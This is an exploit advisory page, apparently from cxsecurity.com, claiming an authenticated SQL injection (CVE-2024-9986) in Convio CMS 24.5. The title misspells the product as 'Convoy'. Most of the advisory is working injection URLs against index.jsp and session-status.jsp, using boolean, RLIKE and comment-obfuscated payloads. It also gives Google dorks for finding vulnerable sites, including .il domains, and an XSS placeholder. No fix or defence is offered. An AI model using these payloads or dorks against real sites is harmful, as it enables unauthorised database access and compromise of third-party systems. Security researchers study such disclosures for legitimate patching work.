Convoy CMS SQL injection 24.5

/*! - # VULNERABILITY: Convio CMS SQL injection Vulnerabilities version 24.5 (Work for ALL VERSION 24) - # Authenticated Persistent SQL injection - # GOOGLE DORK: site:.com /about/news/index.jsp?page=2 - # GOOGLE DORK: site:.il /about/news/index.jsp?page=2 - # DATE: November 2024 - # SECURITY RESEARCHER: E1.Coders - # VENDOR: Convio CMS [http://www.convio.com ] - # SOFTWARE LINK: http://www.convio.com/ - # CVE: CVE-2024-9986 - # CWE: CWE-89 */ ### -- [ Info: ] [i] A valid persistent SQL INJECTION vulnerability was discovered in of the Convio version 24.5 website installed. [i] Vulnerable parameter(s): - inurl:.com /about/news/index.jsp?page=2 ### -- [ Impact: ] [~] Malicious SQL code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Details: ] [~] vulnerable file is "index.jsp" and "session-status.jsp" ### -- [ EXPLOIT : ] https://www.TARGET.com/about/news/index.jsp?page=2{sql inject code} https://www.TARGET.com/about/news/index.jsp?page=2 RLIKE (case when 7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end) https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379-- https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'=' https://www.TARGET.com/search/?q=<XSS SCRIPT BYPASS> ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Referencje:

https://www.cve.org/CVERecord?id=CVE-2024-9986


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top